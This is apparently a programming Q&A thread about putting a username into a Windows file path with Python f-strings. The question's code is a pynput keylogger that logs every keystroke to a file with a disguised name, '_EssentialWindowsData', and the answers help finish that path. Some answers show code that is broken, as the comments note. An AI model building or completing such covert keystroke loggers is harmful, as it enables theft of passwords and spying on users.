# How do I mix a variable with a string of text?

Tags: python

```
from pynput.keyboard import Key, Listener
import logging
import getpass

user = getpass.getuser()
logging.basicConfig(filename=("c:\Users\{user}\Documents\_EssentialWindowsData"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")  
 
def on_press(key):
    logging.info(str(key))
 
with Listener(on_press=on_press) as listener :
    listener.join()
```

My problem is with the 6th line of code in `filename=("c:\Users\{user}\Documents\_EssentialWindowsData")`
I want to integrate the pc's user but don't know how to make it work.

Comment: is the variable user to be surrounded by { and } characters?  Check out use of f string formatting.

Answer (score 3):

Use the power of `rf''` - a ***`r`aw `f`-string***:

```py
>>> from getpass import getuser
>>> rf"c:\Users\{getuser()}\Documents\_EssentialWindowsData"
'c:\\Users\\rnag\\Documents\\_EssentialWindowsData'
```

### The Power of Raw (Strings)

Assume we have a string embedded with `\n` newline and `\t` tab characters:

```py
>>> print('\my\name\is\tom\nhanks')
\my
ame\is  om
hanks
>>> print(r'\my\name\is\tom\nhanks')
\my\name\is\tom\nhanks
```

### The Power of F (Strings)

[***f-strings***](https://realpython.com/python-f-strings/) allow interpolation of variables directly in strings. They are very fast, even (slightly) better than plain string concatenation (`+`).

```py
>>> first = 'Jon'
>>> last = 'Doe'
>>> age = 23
>>> 'my name is {first} {last}, and I am {age}'
'my name is {first} {last}, and I am {age}'
>>> f'my name is {first} {last}, and I am {age}'
'my name is Jon Doe, and I am 23'
>>> 'my name is ' + first + ' ' + last + ', and I am ' + str(age)
'my name is Jon Doe, and I am 23'
>>> 'I am ' + age + ' years old!'
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: must be str, not int
>>> f'I am {age} years old! f-strings RULE!!'
'I am 23 years old! f-strings RULE!!'
```

Answer (score 1):

If you're using Python 3.6 or newer, [f-strings](https://docs.python.org/3/reference/lexical_analysis.html#f-strings) will be your best option. By placing an `f` in front of your string literal, e.g. `f"I'm an f-string {name}"`, you create an f-string that will substitute the variable(s) in curly braces into the f-string. For example, if there had been a `name` variable with the value `Sue`, then the f-string literal would become: `"I'm an f-string Sue"`. Longer example:

```
# we'll use a constant for the example
user = "Sam"

# normal string
"c:\Users\{user}\Documents\_EssentialWindowsData"

# f-string (added `f` in front of string value)
f"c:\Users\{user}\Documents\_EssentialWindowsData"

print(f"c:\Users\{user}\Documents\_EssentialWindowsData")
```

output will be: `"c:\Users\Sam\Documents\_EssentialWindowsData"`

Comment: Highly recommend this answer. The other ones only show the syntax, this one explains how it works.

Comment: @FelixFourcolor How so? This answer does not even work, it needs to be a raw string otherwise it's going to treat the backslash a special character

Comment: Oh I didn't notice it. Thanks for pointing that out!

Answer (score 0):

You can use `string formatting` to add the `users` variable into your string:

```
"c:\Users\{}\Documents\_EssentialWindowsData".format(user)
```

Answer (score -1):

You can use f-strings in Python to achieve this by changing this part:

```
filename=(f"c:\Users\{user}\Documents\_EssentialWindowsData"
```